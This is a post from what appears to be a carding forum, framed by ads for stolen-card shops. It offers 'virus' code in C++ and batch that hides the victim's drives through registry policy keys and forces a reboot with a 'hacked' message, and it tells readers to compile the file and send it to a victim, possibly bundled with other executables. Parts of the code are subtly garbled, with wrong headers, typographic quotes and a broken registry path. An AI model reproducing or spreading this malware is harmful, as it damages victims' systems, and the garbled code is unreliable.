banner Expire 25 October 2025
adv exp at 30 July 2025
banner Expire 10 February 2026
Ad End 1 November 2025
ad End 5 May 2025
ad End 25 October 2025
Ad End 4 April 2026
What's new
UniCvv
banner Expire 20 October 2024
banner Expire 15 January 2025
Money Club cc shop
Wizard's shop 2.0
Ad Ends 13 July 2025
Carding Game
BidenCash Shop
Carding.pw carding forum
Kfc CLub
Yale Lodge
best shop

File_closed07

TRUSTED VERIFIED SELLER
Staff member
Joined
Jun 13, 2020
Messages
8,045
Reaction score
1,019
Points
212
Awards
2
  • trusted user
  • Rich User
Hi friends,here i give you give the C++ virus code. Actually Batch code is converted to C++ virus code. If you like you can use it as batch code also.

C++ Virus Code :
#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( “C:\WINDOWS\system32\HackingStar.bat” ); /*opening or creating new file with .bat extension*/

write << “REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVer sion\policies\Explorer /v NoDrives /t REG_DWORD /d 12n”; write << “REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVer sion\policies\Explorer /v NoViewonDrive /t REG_DWORD /d 12n”; write<<“shutdown -r -c “Sorry Your System is hacked by us!” -f”<<“n”; write.close(); //close file ShellExecute(NULL,”open”,”C:\WINDOWS\system32\HackingStar.bat “,NULL,NULL,SW_SHOWNORMAL); return 0; }
Copy the above code and paste in notepad
Save the file with .cpp extension
Compile and create .exe file in cpp
Note:
Don’t run this c++ program ,it will attack your system itself.
Copy the created .exe file and send it to your victim. You can also attach it with any other
exe files.
Batch Virus Code Creation:
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVer sion\policies\Explorer /v NoDrives /t REG_DWORD /d 12n

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVer sion\policies\Explorer /v NoViewonDrive /t REG_DWORD /d 12n
shutdown -r -c “Sorry Your System is hacked by us!” -f

I think this code will simple for non c++ programmers. It is easy to create the batch file also.
Copy the above code to notepad.
Save it with .bat extension (for ex: nodrivevirus.bat)
Send the file to your victim
 
Ad End 1 November 2024
Top